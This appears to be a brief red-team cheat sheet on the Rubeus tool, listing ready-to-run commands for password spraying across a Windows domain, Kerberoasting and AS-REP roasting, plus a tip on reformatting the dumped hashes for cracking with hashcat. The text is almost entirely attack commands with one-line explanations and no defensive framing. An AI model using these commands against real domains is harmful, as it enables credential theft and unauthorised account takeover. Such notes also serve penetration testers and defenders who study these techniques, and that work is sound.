https://github.com/GhostPack/Rubeus

Password Spraying

Rubeus.exe brute /password:myPassword /noticket
Spray a password against all users in current domain and return the .kirbi TGT of users that use this password.

Kerberoasting

Rubeus.exe kerberoast
Dump Kerberos hashes of kerberoastable users (same as GetUserSPNs.py but on the target machine).

AS_REProasting

Rubeus.exe asreproast
Dump Kerberos hashes of AS_REProastable users. (Then Insert 23$ after $krb5asrep$ and use hashcat -m 18200).